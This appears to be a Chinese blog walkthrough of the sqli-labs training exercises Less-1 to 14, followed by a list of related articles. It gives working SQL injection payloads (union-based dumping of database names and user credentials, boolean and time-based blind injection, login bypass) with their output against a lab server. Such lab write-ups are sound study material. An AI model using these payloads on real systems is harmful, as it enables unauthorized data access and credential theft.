less-1:

1.采用二分法进行猜列:
http://192.236.147.191:30000/Less-1/?id=1' order by 10--+
Welcome    Dhakkan
Unknown column '10' in 'order clause'
//出现错误
2........之后发现该数据只存在三列
http://192.236.147.191:30000/Less-1/?id=1' order by 3--+
Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb
3........已知存在三列
采用http://192.236.147.191:30000/Less-1/?id=1' union select 1,2,3--+
//“union”联合的意思,把两次或多次查询结果合并起来
进行回显;发现句子正确数据却没有任何回显信息.......
Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb
4.将id=1用“-”注释使“id=1”不被执行
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,3--+
此时发现用户名和密码显示为:
                       Welcome    Dhakkan
Your Login name:2
Your Password:3
 
5.查库:
http://192.236.147.191:30000/Less-1/id=-1' union select 1,2, group_concat(schema_name) from information_schema.schemata--+
Welcome    Dhakkan
Your Login name:2
YourPassword:information_schema,challenges,mysql,performance_schema,security
 
6.查表--表于security:
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+ //“security”转为16进制
Welcome    Dhakkan
Your Login name:2
Your Password:emails,referers,uagents,users
 
7.查列--列为users:
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+//“0x”转换十六进制及将“user”转换为16进制
Welcome    Dhakkan
Your Login name:2
Your Password:id,username,password
破解出该用户的“id”,“usernmae”,“password”
 
8.在“security”取出“username”数据:
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,group_concat(username) from security.users--+
Welcome    Dhakkan
Your Login name:2
Your Password:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
 
9.在“security”取出“password”数据:
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,group_concat(password) from security.users--+
Welcome    Dhakkan
Your Login name:2
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
 
10.同时在“security”取出“username”和“password”的数据:
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users--+
Welcome    Dhakkan
Your Login name:2
Your Password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4
小结:
1 查库:select schema_name from information_schema.schemata
2 查表: select table_name from information_schema.tables where table_schema='security'
3 查列: select column_name from information_schema.columns where table_name='users'
5 查字段: select username,password from security.users
less-2:
 
步骤同上,把单引号“ ’ ”去除。
最后结果为:
Welcome    Dhakkan
Your Login name:2
Your Password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4
 
less-3:
 
在“less-1”的基础上 加上字符括号 “(”
及:“ -1') ”
 
less-4:
 
将“less-3”单引号“ ' ”改为双引号“ " ”
及:“ -1") ”
 
less-5:
盲注型
1、http://192.236.147.191:30000/Less-1/?id=1 回显的结果:
Welcome    Dhakkan
You are in...........
 
2、http://192.236.147.191:30000/Less-5/?id=1' 回显的结果:
Welcome    Dhakkan
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
 
3、查看有多少列:
http://192.236.147.191:30000/Less-5/?id=1' order by 3--+
Welcome    Dhakkan
You are in...........
此时正确返回为:“you are in..........”
 
4、(1)对当前数据库第一个字母进行不断猜解尝试:(题型不同不在是union selcet)
http://192.236.147.191:30000/Less-5/?id=1' and left((select database()),1)='s'--+
正确回显信息:
              Welcome    Dhakkan
You are in...........
表明:猜想正确
猜解出第一位为“ s ”
(2)对当前数据库第二个字母进行不断猜解尝试:
?id=1' and left((select database()),2)='se'--+
————回显正确
猜解出第二位为“ e”
.......
(.)依次猜解可知数据库为“ security ”
 
此方法不不仅慢还不实用
此时运用web渗透的“瑞士军刀”: Burpsuite
运用“Burpsuite”可得数据库为:security
 
less-6:
与第五题一样把单引号换为双引号“ " ”
 
less-7:
运用中国菜刀
 
less-8:
法一:布尔盲注 和第六题一样
法二:
时间延迟盲注:
(1):使用延迟的方法:
http://192.236.147.191:30000/Less-8/
?id=1' and sleep(5)--+
(2): 判断字符长度:
http://192.236.147.191:30000/Less-8/?id=1' and if (length(database())=8,1,sleep(5))--+
当数据库长度为8时数据加载很快,但不为8时加载很慢且延迟为5s左右。
 
 
less-9&less-10:
 
都是时间盲注
 
 
less-11:
Welcome   Dhakkan
Username :    
Password :    
 
1.寻找漏洞:
(1) 在输入admin、admin;显示登陆成功;
 
(2) 均在username输入“ ' ”出现:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and password='' LIMIT 0,1' at line 1
说明“ ' ”存在漏洞
 
(3) 此时注释漏洞:“ admin' # ”
回显登陆成功:
Your Login name:admin
Your Password:admin
 
(4) 舍去admin输入“ ' # ”时出现错误
此时输入“ ' or 1=1 # ”回显登陆成功
 
2、查列:
(1)“ ' or 1=1 order by 2 # ” 回显成功只存在两列
 
(2)“ ' union select 1,2 # ” 回显:
Your Login name:1
Your Password:2
 
3、查库:
(1)“ ' union select 1, database() ”查当前数据库;回显:
Your Login name:1
Your Password:security
数据库为:security
 
(2)“ ' union select 1, group_concat(shcema_name) from information_schema.schemata # ” 查所有数据库:回显:
Your Login name:1
Your Password:information_schema,challenges,mysql,performance_schema,security
 
4、查表于security中:
(1)“ ' union select 1, group_concat(table_name) from information_schema.tables where table_schema='security' # ” 在 "security" 查所有表;回显:
Your Login name:1
Your Password:emails,referers,uagents,users
 
5、查列于users中:
“ ' union select 1, group_concat(column_name) from information_schema.columns where table_name='users' # ” 查所有列;回显:
Your Login name:1
Your Password:id,username,password
 
 
6、取出“username” “paasord” 数据:
“ ' union select 1,group_concat(concat_ws('~',username,password)) from security.users # ” 回显:
Your Login name:1
Your Password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4
 
 
less-12 :
") #
 
less-13:
 
ain') or left((select schema_name from information_schema.schemata limit 0,1),1)='a' #
 
1、经猜解漏洞为:“ ') # ”
 
2、查数据库
此题不同上题查询库是没有回显,因此采用布尔盲注;
(1) ') or if(length(database())>1,1,sleep(5)) # ——判断数据库长度是否大于1如果是短时间回显,如果不是睡眠5秒后回显;
此时回显成功
..........
') or if(length(database())=8,1,sleep(5)) # ———经猜解数据库长度为8;
 
(2)') or left(database(),1)='s' # ——回显成功,说明数据库首字母为s
第二位:') or left(database(),2)='se' # ——第二位为e;
..........
因此数据库为:“ security ”
 
3、查表
运用burp suite 暴力破解
(1)
ain') or left((select schema_name from information_schema.schemata limit 0,1),1)='a' #
————information..
 
 
less-14:
1、漏洞为:admin'"
2、查库同上:
由burp suite 可查得数据库
 
3、查表:
(1) '" or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)='a' # ——表为:uses
.........
 
4、查列:
'" or left((select column_name from information_schema.column where table_name='users' limit 0,1),1)='p' #

sql-labs 1-14的更多相关文章

  1. [SQL基础教程]1-4 SQL 表的创建

    [SQL基础教程]1-4 SQL 表的创建 创建数据库 语法 CREATE DATABASE <数据库名称> // example CREATE DATABASE shop; 创建表 语法 ...

  2. 在论坛中出现的比较难的sql问题:14(存储过程问题 存储过程参数、存储过程内的参数)

    原文:在论坛中出现的比较难的sql问题:14(存储过程问题 存储过程参数.存储过程内的参数) 最近,在论坛中,遇到了不少比较难的sql问题,虽然自己都能解决,但发现过几天后,就记不起来了,也忘记解决的 ...

  3. java web数据库(SQL 2008+IDEA 14)环境配置

    废话少说,在之前已经配置过IDEA+Tomcat的环境之后,现在需要进行数据库配置: 1.首先,SQL SERVER2008数据库的安装 (1)将下载的sqlserver 2008数据库进行解压,点击 ...

  4. SQL Serever学习14——存储过程和触发器

    存储过程 在数据库中很多查询都是大同小异,编写他们费时费力,将他们保存起来,以后执行就很方便了,把SQL语句“封装”起来. 存储过程的概念 存储过程是一组SQL语句集,经过编译存储,可以”一次编译,多 ...

  5. SQL Labs刷题补坑记录(less31-less53)

    LESS31: 双引号直接报错,那么肯定可以报错注入,并且也过滤了一些东西,^异或没有过滤,异或真香 -1" and (if(length(database())=8,1,0)) and & ...

  6. SQL Labs刷题补坑记录(less1-less30)

    补坑加1,这几天快速刷一下sqllabs 来巩固下sql注入基础吧,也算是把很久以前没刷的过一遍,do it! 第一部分: LESS1: 直接报错,有回显的注入, http://localhost/s ...

  7. SQL Labs刷题补坑记录(less54-less65)

    LESS54: 只有10次尝试,dump处secret key 直接union 查就可以,括号为单引号闭合 LESS55: 尝试出来闭合的方式为)括号,后面操作与54相同 LESS56: 尝试出来括号 ...

  8. Mysql常用sql语句(14)- 多表查询

    测试必备的Mysql常用sql语句,每天敲一篇,每次敲三遍,每月一循环,全都可记住!! https://www.cnblogs.com/poloyy/category/1683347.html 前言 ...

  9. sql 视图 按where条件多个字段取一个 分类: SQL Server 2014-12-01 14:09 308人阅读 评论(0) 收藏

    首先介绍一下 Case ..When...Then..End  的用法: CASEJiXiaoFind_RowID  WHEN '1' THENJiXiao_Money1  WHEN '2' THEN ...

  10. SQL ID自增列从1开始重新排序 分类: SQL Server 2014-05-19 14:46 652人阅读 评论(0) 收藏

    数据库中把ID自增长重置成1: 一般做法:(太麻烦) 复制表数据->删除原表.新建一张表->粘贴: 新方法: 数据库中:新建查询->复制.粘贴一下代码->修改表名,执行即可(先 ...

随机推荐

  1. 使用dumi生成react组件库文档并发布到github pages

    周末两天玩了下号称西湖区东半球最牛逼的react文档站点生成工具dumi,顺带结合github pages生成了react-uni-comps文档站, 一套弄下来,感觉真香,现在还只是浅尝,高级的特性 ...

  2. 基于Kubernetes实现前后端应用的金丝雀发布

    基于Kubernetes实现前后端应用的金丝雀发布 公司的研发管理平台实现了Gitlab+Kubernetes的Devops,在ToB和ToC场景中,由于用户量大,且预发布环境和生产环境或多或少存在差 ...

  3. Linux内存管理和寻址详解

    1.概念 内存管理模式 段式:内存分为了多段,每段都是连续的内存,不同的段对应不用的用途.每个段的大小都不是统一的,会导致内存碎片和内存交换效率低的问题. 页式:内存划分为多个内存页进行管理,如在 L ...

  4. 学习java 7.20

    学习内容: Stream流 Stream流的生成方式 中间操作方法 终结操作方法 Stream流的收集操作 类加载 类加载器的作用 将.class文件加载到内存中,并为之生成对应的java.lang. ...

  5. 面对大规模 K8s 集群,这款诊断利器必须要“粉一波”!

    作者|段超 来源|尔达 Erda 公众号 背景 我们是一家做商业软件的公司,从一开始我们就把软件交付流程做的非常标准且简单,所有的软件都是基于我们的企业数字化平台 Erda(现已开源)来交付,底层基于 ...

  6. A Child's History of England.39

    He had become Chancellor, when the King thought of making him Archbishop. He was clever, gay, well e ...

  7. Android权限级别(protectionLevel)

    通常情况下,对于需要付费的操作以及可能涉及到用户隐私的操作,我们都会格外敏感. 出于上述考虑以及更多的安全考虑,Android中对一些访问进行了限制,如网络访问(需付费)以及获取联系人(涉及隐私)等. ...

  8. Linux磁盘分区(二)之挂载卸载常用命令

    Linux磁盘分区(二)之挂载卸载常用命令 转自:https://blog.csdn.net/qq_36183935/article/details/81053383           https: ...

  9. 如何使用cURL获得请求/响应具体耗时?

    如何使用cURL一次测量请求和响应时间? cURL支持格式化输出请求的详细信息(请参阅cURL手册页的-w.–write out<format>获取更多信息). 如题,我们将只关注如何知晓 ...

  10. Jenkins环境变量

    目录 一.环境变量 二.自定义环境变量 三.自定义全局变量 四.常用变量定义 五.常用环境变量 一.环境变量 环境变量可以被看作是pipeline与Jenkins交互的媒介.比如,可以在pipelin ...